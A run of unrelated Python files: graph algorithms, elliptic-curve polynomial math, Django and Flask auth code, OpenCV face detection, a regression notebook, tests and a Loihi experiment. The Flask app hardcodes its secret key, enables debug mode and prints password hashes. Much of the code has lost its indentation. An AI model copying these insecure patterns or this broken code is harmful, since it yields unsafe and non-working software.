# 1. Run a BFS from an arbitrary node Y (by convention 0); cost O(n + m);
# 2. From that BFS, find a node X at maximum distance from Y (the root); cost O(n);
# 3. Run a BFS from node X; cost O(n + m);
# 4. From that BFS, find a node Z at maximum distance from X (the root); cost O(n).
# The diameter is exactly that distance, and the two endpoints are (X, Z).
# Total cost: O(n + m).
def max_distanza(distanze):
nodo_estremo = (-1, -1)  # (distance, node index)
for nodo in range(len(distanze)):
if distanze[nodo] >= nodo_estremo[0]:
nodo_estremo = distanze[nodo], nodo
return nodo_estremo
# Step 1.
_, distanze = bfs(0, grafo)
# Step 2.
nodo_estremo = max_distanza(distanze)
# Step 3.
_, distanze = bfs(nodo_estremo[1], grafo)
# Step 4.
diametro = max_distanza(distanze)
# Add 1 to the diameter because the starting node is not counted by the BFS,
# but it should be counted when the diameter is measured in nodes.
# (diameter, extreme node, extreme node or root)
return diametro[0] + 1, nodo_estremo[1], diametro[1]
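# Minimal usage sketch (an addition, not part of the original): the assumed
# representation is an adjacency list, grafo[i] = neighbours of node i.
# The graph below is the path 0-1-2-3, whose diameter spans 4 nodes.
if __name__ == "__main__":
    grafo = [[1], [0, 2], [1, 3], [2]]
    print(diametro_una_dfs(grafo))   # -> (4, 4): depth from node 0, diameter in nodes
    print(diametro_due_bfs(grafo))   # -> (4, 3, 0): diameter in nodes, endpoints 3 and 0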
|
from numpy import argmax
# Works out multinomial coefficient nC(k1,k2,...,km)
def multiCoeff(n, kList):
kMaxFirstPos = argmax(kList)
kMax = kList[kMaxFirstPos]
coefficient = 1
i = kMax + 1
# Perform repeated multiplication and division
# for part of kList up to the maximum
for k in kList[:kMaxFirstPos]:
for j in range(1, k + 1):
coefficient *= i
coefficient //= j
i += 1
# Perform repeated multiplication and division
# for part of kList after the maximum
for k in kList[kMaxFirstPos + 1:]:
for j in range(1, k + 1):
coefficient *= i
coefficient //= j
i += 1
return coefficient
# Works out coefficients of multinomial expansion
# given polynomial coefficents and power
def multiExpand(coeffsList, powersList, power):
l = len(coeffsList)
if l == 1:
return [coeffsList[0] ** power], \
[powersList[0] * power]
if power == 0:
return [1], [0]
if power == 1:
return coeffsList, powersList
newCoeffs = []
newPowers = []
kList = [power]
for i in range(l - 1):
kList.append(0)
newCoeff, newPower = multiCoeff(power, kList), 0
for i in range(l):
newCoeff *= (coeffsList[i] ** kList[i])
newPower += (powersList[i] * kList[i])
newCoeffs.append(newCoeff)
newPowers.append(newPower)
# kList should now look like [power, 0, ... 0]
# (e.g. [5, 0, 0] for power = 5, l = 3)
# Used to work out multinomial coefficients
while kList[l-1] != power:
# Update kList
if kList[l-2] != 0:
kList[l-2] -= 1
kList[l-1] += 1
else:
i = l - 2
while kList[i] == 0:
i -= 1
kList[i] -= 1
kList[i+1] = kList[l-1] + 1
kList[l-1] = 0
# Update newCoeff, newPower
newCoeff, newPower = \
multiCoeff(power, kList), 0
for i in range(l):
newCoeff *= (coeffsList[i] ** kList[i])
newPower += (powersList[i] * kList[i])
ind = newPowers.index(newPower) \
if newPower in newPowers else -1
if ind > -1:
newCoeffs[ind] += newCoeff
else:
newCoeffs.append(newCoeff)
newPowers.append(newPower)
# Remove terms with zero coefficients
i = 0
while i < len(newCoeffs):
if newCoeffs[i] == 0:
newCoeffs.pop(i)
newPowers.pop(i)
else:
i += 1
return newCoeffs, newPowers
# Works out Qsigma - Q^p
def QsMinQp(a, b, QpC, QpP, p):
QpC.pop(0), QpP.pop(0) # First elements cancel
minQpC = [-el for el in QpC] # Take -Q^p coeffs
# Merge middle term of Qsigma into QsigmaMinQp
ind = QpP.index(p) if p in QpP else -1
if ind > -1:
minQpC[ind] += (a ** p)
else:
ind = 0
while ind < len(QpP) and QpP[ind] > p:
ind += 1
if ind == len(QpP):
minQpC.append(a ** p)
QpP.append(p)
else:
minQpC.insert(ind, a ** p)
QpP.insert(ind, p)
# Deal with last element of Qsigma
ind = -1 if 0 in QpP else -2
if ind > -2:
minQpC[ind] += (b ** p)
else:
minQpC.append(b ** p)
QpP.append(0)
# Pop first terms if zero
while minQpC and minQpC[0] == 0:
minQpC.pop(0), QpP.pop(0)
# Pop last terms if zero
while minQpC and minQpC[-1] == 0:
minQpC.pop(), QpP.pop()
return minQpC, QpP
# Works out reduction of x^m in terms of powers of tau
# Coefficients containing powers of x capped at x^2
def xPowerExpand(a, b, power, rDict):
p, r, tauCoeffs = power // 3, power % 3, []
# No need to recalculate if this monomial
# is already in the dictionary - just return
if power in rDict:
return rDict[power]
# "Base case" of recursion
elif p == 0:
new = [0 for i in range(0, r)]
new.append(1)
tauCoeffs.append(new)
else:
# May be higher powers of x before reduction
for i in range(p + 1):
new = [0 for j in range(r)]
tauCoeffs.append(new)
for j in range(i + 1):
# Coefficient of x^j on tau^(i-power)
coeff = multiCoeff(p, [p-i, j, i-j]) \
* ((-a)**j) * ((-b)**(i-j))
tauCoeffs[i].append(coeff)
# Working from coefficients on powers of tau
# closest to zero (higher indices)
i = p
while i >= 0 and len(tauCoeffs[i]) > 3:  # check the index before using it
# Working from coeffs on power of tau
# that are higher powers of x
j = i + r
while j > 2:
# Reduce this power of x by recursion
nCoeffs = xPowerExpand(a, b, j, rDict)
# Merge smaller expansion into main
# expansion to progress reduction
for k in range(len(nCoeffs)):
for l in range(len(nCoeffs[k])):
ind = i + k + 1 - len(nCoeffs)
if len(tauCoeffs[ind]) > l:
tauCoeffs[ind][l] += \
tauCoeffs[i][j] * \
nCoeffs[k][l]
else:
tauCoeffs[ind].append \
(tauCoeffs[i][j] * \
nCoeffs[k][l])
# Remove high power of x from coeff
# of tau term once reduction is done
tauCoeffs[i].pop(j)
j -= 1
i -= 1
rDict[power] = tauCoeffs
return tauCoeffs
# Works out coefficients of polynomial in
# tau = y^-2 after reduction (x^3 = y^2 - ax - b)
def reducePoly(a, b, cList, pList, p, rDict):
# Rewrite given polynomial in terms of tau
# Reduce each power of x in turn and
# combine into a single list of coefficients
# Use first monomial's expansion as a base
expn = xPowerExpand(a, b, pList[0], rDict)
expnStr = expStr(expn, 0)
print(f"Reduction of x^{pList[0]} = {expnStr}")
# Make sure the correct multiple is used
factor = cList[0]
for i in range(0, len(expn)):
expn[i] = [factor * el for el in expn[i]]
# Then add multiples of other lists
for i in range(1, len(pList)):
factor = cList[i]
tmp = xPowerExpand(a, b, pList[i], rDict)
tmpStr = expStr(tmp, 0)
print(f"Reduction of x^{pList[i]} = {tmpStr}")
for j in range(len(tmp)):
for k in range(len(tmp[j])):
expn[j + len(expn) - len(tmp)][k] += \
(tmp[j][k] * factor)
return expn
def rXY(a, b, p):
# reductionDict is a dictionary for tracking
# monomials whose reductions are already computed
reductionDict = {}
# Arrays to represent the polynomial Q(x)
coeffs, powers = [1, a, b], [3, 1, 0]
# Step 1: find Qsigma - Q^p
QpC, QpP = multiExpand(coeffs, powers, p)
QsMinQpC, QsMinQpP = QsMinQp(a, b, QpC, QpP, p)
QsMinQpStr = polyStr(QsMinQpC, QsMinQpP)
print(f"(Qsigma - Q^p) = {QsMinQpStr}\n")
# Step 2: rewrite Qsigma - Q^p in terms of tau
expansion = reducePoly(a, b, \
QsMinQpC, QsMinQpP, p, reductionDict)
return expansion
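# The formatting helpers polyStr and expStr are referenced above but are not
# included in this snippet.  The stand-ins below are assumptions sketched only
# so the script can run end to end; the original output format may differ.
def polyStr(cList, pList):
    # Render a sparse polynomial from parallel coefficient/power lists,
    # e.g. [1, a, b], [3, 1, 0] -> "1x^3 + ax + b" style output.
    terms = []
    for c, e in zip(cList, pList):
        if c == 0:
            continue
        if e == 0:
            terms.append(str(c))
        elif e == 1:
            terms.append(f"{c}x")
        else:
            terms.append(f"{c}x^{e}")
    return " + ".join(terms) if terms else "0"
def expStr(tauCoeffs, p):
    # Render a list of x-coefficient lists, one inner list per power of
    # tau = y^-2.  The tau-exponent labelling used here (last inner list
    # treated as the tau^0 term) is an assumption.
    parts = []
    n = len(tauCoeffs)
    for i, xCoeffs in enumerate(tauCoeffs):
        inner = polyStr(xCoeffs, list(range(len(xCoeffs))))
        parts.append(f"({inner})*tau^{n - 1 - i}")
    return " + ".join(parts) if parts else "0"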
# Coefficients on Q(x) = x^3 + ax + b; prime = p
a = int(input("Please enter a value for (a) in " + \
"x^3 + ax + b. "))
b = int(input("Please also enter a value for (b). "))
p = int(input("Finally, please enter a prime p " + \
"to determine the field. "))
# Set up arrays to represent Q as a polynomial
coeffs, powers = [1, a, b], [3, 1, 0]
print("\nThe polynomial entered was " + \
f"{polyStr(coeffs, powers)}.\n")
# Output results
rXY_str = expStr(rXY(a, b, p), p)
print(f"\nR(x,y) = {rXY_str}")
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin, UserManager, Group
from django.utils.translation import ugettext_lazy as _
from movies_app.model.roles import Roles
class CustomUserManager(UserManager):
def _create_user(self, email, password, **extra_fields):
"""
Create and save a user with the given email, and password.
"""
# if not email:
# raise ValueError('The given email must be set')
# email = self.normalize_email(email)
user = self.model(email=email, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, email=None, password=None, **extra_fields):
extra_fields.setdefault('is_staff', False)
extra_fields.setdefault('is_active', True)
extra_fields.setdefault('is_superuser', False)
return self._create_user(email, password, **extra_fields)
def create_superuser(self, email, password, **extra_fields):
extra_fields.setdefault('is_staff', True)
extra_fields.setdefault('is_active', True)
extra_fields.setdefault('is_superuser', True)
group, created = Roles.objects.get_or_create(name='Superuser')
extra_fields.setdefault('role_id', group.id)
if extra_fields.get('is_staff') is not True:
raise ValueError('Superuser must have is_staff=True.')
if extra_fields.get('is_superuser') is not True:
raise ValueError('Superuser must have is_superuser=True.')
return self._create_user(email, password, **extra_fields)
class UserPermissionMixin(PermissionsMixin):
is_superuser = models.BooleanField(_('superuser status'),
default=False,
help_text=_(
'Designates that this user has all permissions without '
'explicitly assigning them.'
),
)
groups = None
user_permissions = None
is_staff = False
class Meta:
abstract = True
def get_group_permissions(self, obj=None):
pass
def get_all_permissions(self, obj=None):
pass
class User(AbstractBaseUser, PermissionsMixin):
"""
A fully featured User model with admin-compliant permissions.
email and password are required. Other fields are optional.
is_active : controls whether the user may log in (True allows login, False blocks it)
is_superuser / is_staff : True for superusers and admin users
is_verified : users in the dealership and showroom categories are verified by an admin
"""
first_name = models.CharField(_('first name'), max_length=256, blank=True, null=True)
last_name = models.CharField(_('last name'), max_length=256, blank=True, null=True)
email = models.EmailField(_('email address'), null=True, blank=True, unique=True)
username = models.CharField(
_('username'),
max_length=150,
help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),
null=True,
blank=True, unique=True
)
is_staff = models.BooleanField(_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin site.'),
)
is_active = models.BooleanField(_('active'), default=True,
help_text=_('Designates whether this user should be treated as active. '
'Unselect this instead of deleting accounts.'), )
STATUS_CHOICES = (
('active', 'active'),
('inactive', 'inactive'),
('deleted', 'deleted')
)
status = models.CharField(choices=STATUS_CHOICES, max_length=20, default='active')
role = models.ForeignKey(Roles, on_delete=models.SET_NULL, null=True, blank=True, related_name='user_role')
objects = CustomUserManager()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
class Meta:
db_table = 'user'
verbose_name = _('user')
verbose_name_plural = _('users')
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
last_name = self.last_name if self.last_name else ''
first_name = self.first_name if self.first_name else ''
full_name = '%s %s' % (first_name, last_name)
return full_name.strip()
|
import cv2
import imutils
import time
model_path = "face-detection-adas-0001.xml"
pbtxt_path = "face-detection-adas-0001.bin"
net = cv2.dnn.readNet(model_path, pbtxt_path)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)
camera = cv2.VideoCapture(0)
frameID = 0
grabbed = True
start_time = time.time()
while grabbed:
(grabbed, img) = camera.read()
if not grabbed:  # stop cleanly if the camera returns no frame
    break
img = cv2.resize(img, (900, 640))
frame = img.copy()
# Prepare input blob and perform an inference
blob = cv2.dnn.blobFromImage(frame, size=(672, 384), ddepth=cv2.CV_8U)
net.setInput(blob)
out = net.forward()
# Draw detected faces on the frame
for detection in out.reshape(-1, 7):
confidence = float(detection[2])
xmin = int(detection[3] * frame.shape[1])
ymin = int(detection[4] * frame.shape[0])
xmax = int(detection[5] * frame.shape[1])
ymax = int(detection[6] * frame.shape[0])
if confidence > 0.5:
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 0))
cv2.imshow("FRAME", frame)
frameID += 1
fps = frameID / (time.time() - start_time)
print("FPS:", fps)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
camera.release()
cv2.destroyAllWindows()
|
from django.shortcuts import render
from .lookup import perform_lookup
from django.http import JsonResponse
def search_view(request):
q_params = request.GET
q = q_params.get('q')
context = {}
if q is not None:
results = perform_lookup(q, internal_sort=True)
context['results'] = results
context['query'] = q
return render(request, 'search.html', context)
|
fildir = r'D:\SQ\log.txt'  # sum up the sizes for every file-name extension
filer_R = open(fildir, 'r')
lines = filer_R.read().splitlines()  # read everything and strip all newline characters
del lines[0], lines[-1]  # drop the header and trailer lines
res = []  # stores [extension, accumulated size] pairs
for line in lines:
    r_s = line.split('\t')
    file_Type = r_s[0].split('.')[-1].strip()  # take field 0, split on '.', keep the last piece (the extension), strip spaces
    file_Size = int(r_s[1].strip())  # take the second field, strip spaces, convert to int so it can be summed
    inFlag = False
    for one in res:
        if file_Type == one[0]:
            one[1] += file_Size  # accumulate the size for this extension
            inFlag = True
            break
    if not inFlag:
        res.append([file_Type, file_Size])
print(res)
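# A more compact variant of the same aggregation using a dict (a sketch; it
# assumes the same tab-separated "name<TAB>size" line format as above):
# totals = {}
# for line in lines:
#     name, size = line.split('\t')[:2]
#     ext = name.split('.')[-1].strip()
#     totals[ext] = totals.get(ext, 0) + int(size.strip())
# print(totals)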
|
#[1] import the modules and data
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from scipy.stats import skew
from scipy.stats.stats import pearsonr
'''
%config InlineBackend.figure_format = 'retina' #set 'png' here when working on notebook
%matplotlib inline
'''
train = pd.read_csv("../input/train.csv")
test = pd.read_csv("../input/test.csv")
#[2] Data preprocessing
all_data = pd.concat((train.loc[:,'MSSubClass':'SaleCondition'],
test.loc[:,'MSSubClass':'SaleCondition'])) #Process the dataset together
#{ rcParams } Set the Image pixel, 'rc' means configuration
matplotlib.rcParams['figure.figsize'] = (12.0, 6.0)
prices = pd.DataFrame({"price":train["SalePrice"], "log(price + 1)":np.log1p(train["SalePrice"])})
prices.hist()
'''We can see that the skewed values have been normalized by the log transform'''
#[3] Transform the data
train["SalePrice"] = np.log1p(train["SalePrice"]) #log transform the target
#log transform skewed numeric features:
numeric_feats = all_data.dtypes[all_data.dtypes != "object"].index  # select the columns whose dtype is not object (the numeric columns)
skewed_feats = train[numeric_feats].apply(lambda x: skew(x.dropna())) #compute skewness, just for the training set
skewed_feats = skewed_feats[skewed_feats > 0.75]#Choose the numeric column that skewness>0.75
skewed_feats = skewed_feats.index
all_data[skewed_feats] = np.log1p(all_data[skewed_feats])#Transform the chosen columns
#[4] One-hot, fill the missing value and create matrices for sklearn
all_data = pd.get_dummies(all_data)
all_data = all_data.fillna(all_data.mean()) #filling NA's with the mean of the column
X_train = all_data[:train.shape[0]]
X_test = all_data[train.shape[0]:]
y = train.SalePrice
'''
After the simple transform, now using regularized linear regression models
The author tried both l_1(Lasso) and l_2(Ridge) regularization
He also defined a function that returns the cross-validation rmse to evaluate the model
'''
#[5] Model
from sklearn.linear_model import Ridge, RidgeCV, ElasticNet, LassoCV, LassoLarsCV
from sklearn.model_selection import cross_val_score
#{ rmse } root-mean-square error: measures the deviation between predicted values and observed values
def rmse_cv(model):
rmse= np.sqrt(-cross_val_score(model, X_train, y, scoring="neg_mean_squared_error", cv = 5))
return(rmse)
model_ridge = Ridge()
alphas = [0.05, 0.1, 0.3, 1, 3, 5, 10, 15, 30, 50, 75]#Adjusting parameters
# higher { alpha } means more restriction on coefficient 'w'(May improve the generalization performance and avoid overfit)
cv_ridge = [rmse_cv(Ridge(alpha = alpha)).mean() for alpha in alphas]
#Visualization: alphas-rmse
cv_ridge = pd.Series(cv_ridge, index = alphas)
cv_ridge.plot(title = "Validation - Just Do It")
plt.xlabel("alpha")
plt.ylabel("rmse")
#check the Root Mean Squared Logarithmic Error
cv_ridge.min()#The smaller the better
#Next try Lasso
model_lasso = LassoCV(alphas = [1, 0.1, 0.001, 0.0005]).fit(X_train, y)
rmse_cv(model_lasso).mean()
#[6] Check the coefficients
'''
Note:
Lasso is that it does feature selection for you - setting coefficients of features it deems unimportant to zero
Check how many features it choose:
'''
coef = pd.Series(model_lasso.coef_, index = X_train.columns)
print("Lasso picked " + str(sum(coef != 0)) + " variables and eliminated the other " + str(sum(coef == 0)) + " variables")
#Take a look directly at what the most important coefficients are
imp_coef = pd.concat([coef.sort_values().head(10),coef.sort_values().tail(10)])
matplotlib.rcParams['figure.figsize'] = (8.0, 10.0)
imp_coef.plot(kind = "barh")
plt.title("Coefficients in the Lasso Model")
'''
These are the actual coefficients 'w' in the model,
so it is easy to explain why a given price was predicted
'''
#[7] Look at the residuals
matplotlib.rcParams['figure.figsize'] = (6.0, 6.0)
preds = pd.DataFrame({"preds":model_lasso.predict(X_train), "true":y})
preds["residuals"] = preds["true"] - preds["preds"]
preds.plot(x = "preds", y = "residuals",kind = "scatter")
#[8] Add an xgboost model
import xgboost as xgb
dtrain = xgb.DMatrix(X_train, label = y)
dtest = xgb.DMatrix(X_test)
params = {"max_depth":2, "eta":0.1}
model = xgb.cv(params, dtrain, num_boost_round=500, early_stopping_rounds=100)
model.loc[30:,["test-rmse-mean", "train-rmse-mean"]].plot()#visualize the rmse-mean changing
model_xgb = xgb.XGBRegressor(n_estimators=360, max_depth=2, learning_rate=0.1) #the params were tuned using xgb.cv
model_xgb.fit(X_train, y)
#[9] Prediction
xgb_preds = np.expm1(model_xgb.predict(X_test))
lasso_preds = np.expm1(model_lasso.predict(X_test))
predictions = pd.DataFrame({"xgb":xgb_preds, "lasso":lasso_preds})
predictions.plot(x = "xgb", y = "lasso", kind = "scatter")
preds = 0.7*lasso_preds + 0.3*xgb_preds #Take a weighted average of uncorrelated results
solution = pd.DataFrame({"id":test.Id, "SalePrice":preds})
solution.to_csv("ridge_sol.csv", index = False)
|
from demo.app import app
|
from flask import Flask, render_template, request, redirect, session, flash
import re
from mysqlconnection import connectToMySQL
from flask_bcrypt import Bcrypt
app = Flask(__name__)
bcrypt = Bcrypt(app)
app.secret_key = '5153fe473438c82c17e638dd778b6b5e'
email_regex = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
@app.route('/')
def registration():
print(session)
keylist = []
for key in session.keys():
keylist.append(key)
for key in keylist:
session.pop(key)
print(session)
session['title']= 'Login or Register'
return render_template('index.html')
@app.route('/success', methods=['POST'])
def success():
session['title'] = 'Success'
is_valid = True
register = False
db = connectToMySQL('login_registration')
if 'fn' in request.form: # enters into conditional upon registration submit button
register = True
data = {
'fn': request.form['fn'],
'ln': request.form['ln'],
'email': request.form['email'],
}
if len(request.form['fn']) < 1:
flash('Must enter a first name to register', 'fn')
is_valid = False
if len(request.form['ln']) < 1:
flash('Must enter a last name to register', 'ln')
is_valid = False
if not email_regex.match(request.form['email']):
flash('Invalid email address!', 'email')
is_valid = False
if not re.match(r'^(?=.*[A-Z])(?=.*[a-z])(?=.*\d)(?=.*[@#$%^&+=])[A-Za-z0-9@#$%^&+=]{8,}$', request.form['pw']):
flash('''Password must be at least 8 characters long, have at least
one uppercase and one lowercase letter, at least one number,
and one special character (@#$%^&+=)''', 'pw')
is_valid = False
elif request.form['pwconfirm'] != request.form['pw']:
flash('Must match above password', 'pwconfirm')
is_valid = False
else:
pw_hash = bcrypt.generate_password_hash(request.form['pw'])
data['pw'] = pw_hash
print(data, '&&&&&&&&&&&&&&&&&&&&&&&')
else: # goes into here if 'fn' not in request dict, so on login -checks password
data = {'email': request.form['email']}
query = 'SELECT pw_hash FROM users WHERE email=%(email)s'
check = db.query_db(query, data)
if check and bcrypt.check_password_hash(check[0]['pw_hash'], request.form['pw']):
db = connectToMySQL('login_registration')
query = "SELECT * FROM users WHERE email = %(email)s"
user = db.query_db(query, data)
session['user'] = user[0]
session['header_message'] = 'You have successfully logged in!'
else:
return redirect('/')
if is_valid is False: # checks if validation failed for registration
return redirect('/')
if register: # checks if email in db, then runs insert into db for registration
db = connectToMySQL('login_registration')
query = "SELECT email FROM users WHERE email = %(email)s"
check = db.query_db(query, data)
if len(check) > 0:
flash('Email already has an account.')
return redirect('/')
db = connectToMySQL('login_registration')
query = """INSERT INTO users(first_name, last_name, email, pw_hash,
created_at, updated_at) VALUES(%(fn)s, %(ln)s, %(email)s,
%(pw)s, now(), now())"""
db.query_db(query, data)
session['header_message'] = 'You have successfully created an account!'
db = connectToMySQL('login_registration')
query = "SELECT * FROM users WHERE email = %(email)s"
user = db.query_db(query, data)
session['user'] = user[0]
return render_template('success.html') #only renders on successful registration/login
@app.route('/logout')
def logout():
session.clear()
return redirect('/')
if __name__ == "__main__":
app.run(debug=True)
|
"""Test the analog.renderers module."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
try:
from unittest import mock
except ImportError:
import mock
import pytest
from analog import renderers
from analog import Report
from analog.exceptions import UnknownRendererError
class TestRendererBase():
"""The ``Renderer`` baseclass provides utilities for renderer lookup."""
def test_all_renderers(self):
"""For a list of available renderers, use ``Renderer.all_renderers``."""
all_renderers = renderers.Renderer.all_renderers()
assert sorted(all_renderers) == sorted(
['plain', 'grid', 'table', 'csv', 'tsv'])
def test_renderer_by_name(self):
"""Use ``Renderer.by_name`` to retrieve a specific renderer."""
renderer = renderers.Renderer.by_name('plain')
assert isinstance(renderer, renderers.PlainTextRenderer)
def test_unknown_renderer(self):
"""``UnknownRendererError`` is raised for unknown renderer names."""
with pytest.raises(UnknownRendererError):
renderers.Renderer.by_name('unknown')
def test_renderer_abstract(self):
"""``Renderer`` is an abstract baseclass and cannot be used directly."""
with pytest.raises(TypeError) as exc:
renderers.Renderer()
assert exc.exconly() == ("TypeError: Can't instantiate abstract class "
"Renderer with abstract methods render")
class TestRenderers():
"""Test different available report renderers."""
def setup(self):
"""Define report for renderer tests."""
self.report = Report(verbs=['GET', 'POST', 'PATCH'],
status_codes=['2', '4', '5'])
self.report.add(path='/foo/bar/1', verb='GET', status=200,
time=0.1, upstream_time=0.09, body_bytes=255)
self.report.add(path='/foo/bar/1', verb='GET', status=200,
time=0.1, upstream_time=0.09, body_bytes=255)
self.report.add(path='/foo/bar', verb='POST', status=200,
time=0.12, upstream_time=0.12, body_bytes=402)
self.report.add(path='/foo/bar', verb='POST', status=409,
time=0.21, upstream_time=0.20, body_bytes=23)
self.report.add(path='/foo/bar', verb='GET', status=200,
time=0.23, upstream_time=0.22, body_bytes=212)
self.report.add(path='/foo/bar/1', verb='PATCH', status=200,
time=0.1, upstream_time=0.1, body_bytes=320)
self.report.add(path='/foo/bar/1', verb='POST', status=404,
time=0.1, upstream_time=0.1, body_bytes=0)
self.report.add(path='/foo/bar/1', verb='POST', status=404,
time=0.1, upstream_time=0.1, body_bytes=0)
self.report.add(path='/foo/bar/1', verb='POST', status=200,
time=0.2, upstream_time=0.2, body_bytes=123)
def read(self, path):
"""Return should-be output from test output dir."""
output = ''
with open(os.path.abspath(os.path.join(
os.path.dirname(__file__), 'output', path + '.txt'))) as fp:
output = fp.read()
return output
def test_renderer_output(self):
"""Make sure renderer output look alright."""
for output_format in sorted(renderers.Renderer.all_renderers().keys()):
output = self.report.render(
path_stats=True, output_format=output_format)
expected = self.read(output_format)
assert output == expected
def test_csvrenderer_py27_stringio(self):
"""Handle that StringIO does not accept newline arg on Python 2.7."""
csvrenderer = renderers.CSVRenderer()
csvrenderer.render
# StringIO has newline argument in Python3.3
with mock.patch('analog.renderers.StringIO') as mock_stringio:
csvrenderer.render(report=self.report, path_stats=False)
mock_stringio.assert_called_once_with(newline='')
# but not in Python2.7
try:
with mock.patch('analog.renderers.StringIO',
side_effect=[TypeError, mock.DEFAULT]
) as mock_stringio:
csvrenderer.render(report=self.report, path_stats=False)
assert mock_stringio.call_args_list == [mock.call(newline=''),
mock.call()]
# NOTE: returning mock.DEFAULT does not return the default MagicMock
# on Python2.7 when using the non-stdlib mock package.
# See: https://code.google.com/p/mock/issues/detail?id=190
except (TypeError, AttributeError) as exc:
# on Python2.7 it's a TypeError, on PyPy it's an AttributeError
message = getattr(exc, 'message', getattr(exc, 'args', None))
if isinstance(message, (list, tuple)):
message = message[0]
if message is None or message not in (
'argument 1 must have a "write" method',
"'_SentinelObject' object has no attribute 'write'"):
raise
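# A minimal usage sketch of the renderer registry exercised by the tests above,
# assuming the ``analog.renderers`` module and an already-built ``Report`` named
# ``report`` (both names are taken from the tests, not defined here):
#
#     from analog import renderers
#     for fmt in sorted(renderers.Renderer.all_renderers()):
#         renderer = renderers.Renderer.by_name(fmt)
#         output = renderer.render(report=report, path_stats=True)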
|
url = 'https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md'
print('hr_admin_module')
|
# Loihi modules
import nxsdk.api.n2a as nx
# Official modules
import numpy as np
import logging
from copy import deepcopy
import os
# Pelenet modules
from ..system import System
from ..system.datalog import Datalog
from ..parameters import Parameters
from ..utils import Utils
from ..plots import Plot
from .readout import ReadoutExperiment
from ..network import ReservoirNetwork
"""
@desc: Class for comparing anisotropic nest simulation with anisotropic loihi simulation
"""
class Stream(ReadoutExperiment):
"""
@desc: Initiates the experiment
"""
def __init__(self):
super().__init__()
"""
@desc: Overwrite parameters for this experiment
"""
def updateParameters(self):
        # Update parameters from parent
p = super().updateParameters()
return {
# Parameters from parent
**p,
# Experiment
'trials': 1,
'stepsPerTrial': 2000,
# Input
'patchNeuronsShiftX': 44,
'patchNeuronsShiftY': 24,
# Network
'refractoryDelay': 2, # Sparse activity (high values) vs. dense activity (low values)
'compartmentVoltageDecay': 500, # Slows down / speeds up
'compartmentCurrentDecay': 500, # Variability (higher values) vs. Stability (lower values)
            'thresholdMant': 1000,  # Slower spread (high values) vs. faster spread (low values)
# Probes
'isExSpikeProbe': True,
'isOutSpikeProbe': False
}
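# Note on the parameter-override pattern above (a sketch using plain dict semantics):
# ``{**p, 'trials': 1}`` copies the parent parameter dict and overrides only the listed keys, e.g.
#     p = {'trials': 5, 'stepsPerTrial': 100}
#     {**p, 'trials': 1}  # -> {'trials': 1, 'stepsPerTrial': 100}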
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from copy import deepcopy, copy
from pickle import HIGHEST_PROTOCOL
import six
import collections
import time
import hashlib
import os
import inspect
from functools import partial
from six.moves import cPickle as pickle
import gc
import stat
from flexp.flow import Chain
from flexp.utils import get_logger
log = get_logger(__name__)
RWRWRW = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH
GB = 1024 ** 3
class PickleMixinP2(object):
"""Add pickling python2 functionality to any class."""
def __init__(self, *args, **kwargs):
self._pickler = pickle.Pickler(-1)
self._pickler.fast = 1
super(PickleMixinP2, self).__init__(*args, **kwargs)
def pickle(self, obj, encode=False):
if encode and isinstance(obj, six.text_type):
obj = obj.encode("utf8")
return self._pickler.dump(obj).getvalue()
def unpickle(self, s):
return pickle.loads(s)
class PickleMixinP3(object):
"""Add pickling python3 functionality to any class.
Unfortunately unicode strings pickled by python2 cannot be reproduced in python3.
"""
def pickle(self, obj, version=-1, encode=False):
if encode and isinstance(obj, six.text_type):
obj = obj.encode("utf8") # convert all string into UTF-8
return pickle.dumps(obj, version)
def unpickle(self, s):
try:
return pickle.loads(s, encoding='utf-8')
except UnicodeDecodeError:
# fallback for very old mdbs
return pickle.loads(s, encoding='bytes')
if six.PY3:
PickleMixin = PickleMixinP3
else:
PickleMixin = PickleMixinP2
class ObjectDumper(PickleMixin):
"""Functionality of this class is used in PickleCache and CachingChain"""
def _object_dump_to_string(self, obj, max_recursion_level, level=0, debug_level=0):
"""Consolidate object with its attributes and their values into ony byte-string.
If object has PickleCacheBlackList class attribute then attributes listed there are not taken into account.
:param obj: Object instance
:param int level: recursion level
:param int debug_level: debug_level 0 (silence), 1 or 2 (full)
        :return: byte-string image of the object and its attributes
"""
if level > max_recursion_level:
return "".encode("ASCII")
dump_string = obj.__class__.__name__.encode("ASCII")
if debug_level == 2:
print("\t"*level+"level: {}, class name {}".format(level, dump_string))
if hasattr(obj, '__name__'): # to distinguish functions from each other
dump_string += obj.__name__.encode("ASCII")
if debug_level == 2:
print("\t"*level+"level: {}, function name {}".format(level, obj.__name__.encode("ASCII")))
# Get insides of the objects, based on the type
if isinstance(obj, str):
if debug_level == 2:
print("\t"*level+"level: {}, obj is str: {}".format(level, obj))
            return dump_string + (obj.encode("utf8") if isinstance(obj, six.text_type) else obj)
else:
try:
items = copy(vars(obj))
if hasattr(obj, 'PickleCacheBlackList'):
if debug_level == 2:
print("\t" * level + "obj has blacklist", obj.PickleCacheBlackList)
for v in obj.PickleCacheBlackList:
del items[v]
items = sorted(items.items())
except:
try:
items = sorted(obj.items())
except:
# Try to sort the items.
try:
items = [(str(i), o) for i, o in enumerate(sorted(obj))]
except:
# After all fails, do not sort the insides, but this can be bad.
# Print log that this happens.
items = [(str(i), o) for i, o in enumerate(obj)]
if len(items) > 0:
log.debug("Can't sort insides of object type {}, first element is {}".format(obj.__class__.__name__, items[0][1].__class__.__name__))
if debug_level == 2:
